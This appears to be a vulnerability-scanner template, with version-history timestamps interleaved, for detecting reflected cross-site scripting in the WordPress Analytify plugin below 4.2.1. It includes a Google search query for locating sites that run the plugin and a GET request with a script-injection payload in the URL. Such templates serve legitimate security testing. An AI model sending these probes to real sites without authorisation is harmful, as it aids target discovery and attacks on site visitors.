2022-07-27 11:16:12 +00:00
id : analytify-plugin-xss
info :
2022-09-08 13:28:46 +00:00
name : Analytify <4.2.1 - Cross-Site Scripting
2022-07-27 11:16:12 +00:00
author : Akincibor
severity : medium
description : |
2022-09-08 13:28:46 +00:00
WordPress Analytify 4.2.1 does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to reflected cross-site scripting.
2022-07-27 11:16:12 +00:00
reference :
- https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5
metadata :
verified : true
2022-09-08 22:39:14 +00:00
google-query : inurl:/wp-content/plugins/wp-analytify
2022-09-08 13:28:46 +00:00
classification :
2023-03-03 15:27:54 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cwe-id : CWE-80
2022-08-27 04:41:18 +00:00
tags : wp,wordpress,analytify,wpscan,wp-plugin,xss
2022-07-27 11:16:12 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/aa404bb?a</script><script>alert(/XSS/)</script>'
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'text/javascript">alert(/XSS/)</script>'
- 'wp-analytify'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 404
2022-09-08 13:28:46 +00:00
# Enhanced by mp on 2022/09/07